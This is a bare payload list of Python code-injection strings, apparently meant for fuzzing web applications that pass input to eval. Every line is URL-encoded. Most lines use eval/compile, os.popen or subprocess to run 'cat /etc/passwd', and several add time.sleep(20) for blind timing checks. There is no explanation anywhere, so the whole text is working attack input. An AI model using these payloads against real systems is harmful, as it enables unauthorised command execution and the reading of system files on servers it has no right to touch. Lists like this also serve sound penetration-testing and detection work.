eval(compile("""for+x+in+range(1):\\n+import+os\\n+os.popen(r'cat+/etc/passwd').read()""",'','single'))
eval(compile("""__import__('os').popen(r'cat+/etc/passwd').read()""",'','single'))
__import__('os').popen('cat+/etc/passwd').read()
eval(compile('for+x+in+range(1):\%0A+import+time\%0A+time.sleep(20)','a','single'))
eval(compile("""for+x+in+range(1):\n+import+os\n+os.popen(r'cat+/etc/passwd').read()""",'','single'))
eval(compile("""__import__('os').popen(r'cat+/etc/passwd').read()""",'','single'))
__import__('os').popen('cat+/etc/passwd').read()
str("injectx"*3),__import__('os').popen('cat+/etc/passwd').read()
eval(compile("""__import__('os').popen(r'cat+/etc/passwd').read()""",'','single'))
eval(compile("""__import__('subprocess').check_output(r'cat+/etc/passwd',shell=True)""",'','single'))
eval(compile("""__import__('os').popen(r'cat+/etc/passwd').read();import+time;time.sleep(20)""",'','single'))
eval(compile("""__import__('subprocess').check_output(r'cat+/etc/passwd',shell=True);import+time;time.sleep(20)""",'','single'))
eval(compile("""for+x+in+range(1):\n+import+os\n+os.popen(r'cat+/etc/passwd').read()""",'','single'))
eval(compile("""for+x+in+range(1):\n+import+subprocess\n+subprocess.Popen(r'cat+/etc/passwd',shell=True,+stdout=subprocess.PIPE).stdout.read()""",'','single'))
eval(compile("""for+x+in+range(1):\n+import+subprocess\n+subprocess.check_output(r'cat+/etc/passwd',shell=True)""",'','single'))
